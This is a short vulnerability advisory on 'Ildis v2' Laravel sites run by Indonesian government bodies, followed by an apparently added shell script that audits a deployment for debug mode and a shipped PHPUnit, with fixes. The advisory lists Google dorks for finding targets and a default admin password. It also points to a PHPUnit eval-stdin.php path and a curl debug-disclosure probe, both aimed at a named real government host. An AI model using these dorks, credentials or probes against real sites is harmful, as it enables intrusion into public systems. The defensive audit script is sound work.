# Exploit Title : Ildis v2 Applications Multiple Vulnerabilities
# Vendor Homepage : http://jdihn.go.id
# Discovered By: KimiHmei7
# Author Homepage:
https://tegalsec.org
https://draxploit.web.id
# Framework: Laravel
# Google Dork:
"ILDIS" site:go.id
inurl:?tipe_dokumen= site:go.id
inurl:/data_dokumen site:go.id
intitle:Signin | ILDIS JDIHN
# Vulnerabilities
1. Default Login
https://site.go.id/login admin | admin123
2. PHPUnit Remote Code Execution
http://jdih.dprd.belitung.go.id//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php (blank; maybe vulnerable, but can't get RCE access. Other sites use the same path.)
3. Laravel Debug Misconfiguration / Information Disclosure
$ curl -d 1=1 http://jdih.dprd.belitung.go.id/
Thanks to DragonXploiter (Haikal)
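
A server-side check for issues 2 and 3 above, as an added example that is not part of the original advisory: it inspects a deployment directory on disk for debug mode left on and for PHPUnit's eval-stdin.php shipped with the application. The function name, finding labels and sample tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: offline audit of a Laravel deployment directory.
# Prints one finding per line; prints nothing when the tree is clean.
audit_laravel() {
    root=$1

    # Issue 3: APP_DEBUG=true in .env makes Laravel render detailed error pages.
    if [ -f "$root/.env" ] &&
       grep -Eiq '^[[:space:]]*APP_DEBUG[[:space:]]*=[[:space:]]*"?true"?[[:space:]]*$' "$root/.env"; then
        echo "DEBUG_ENABLED $root/.env"
    fi

    # Issue 2: PHPUnit (a dev dependency) deployed with the application.
    f="$root/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
    if [ -f "$f" ]; then
        echo "PHPUNIT_DEPLOYED $f"
    fi

    # Heuristic: vendor/ is web-reachable when it sits under public/, or when
    # index.php lives beside vendor/ (project root used as document root).
    if [ -d "$root/public/vendor/phpunit" ] ||
       { [ -f "$root/index.php" ] && [ -d "$root/vendor" ]; }; then
        echo "VENDOR_WEB_REACHABLE $root"
    fi
    return 0
}

# Constructed sample tree (not a real site) exhibiting all three findings.
demo=$(mktemp -d)
mkdir -p "$demo/vendor/phpunit/phpunit/src/Util/PHP"
: > "$demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
: > "$demo/index.php"
printf 'APP_ENV=production\nAPP_DEBUG=true\n' > "$demo/.env"
audit_laravel "$demo"
rm -rf "$demo"
```

The findings are cleared by setting APP_DEBUG=false, installing dependencies with `composer install --no-dev`, and pointing the web server's document root at `public/`.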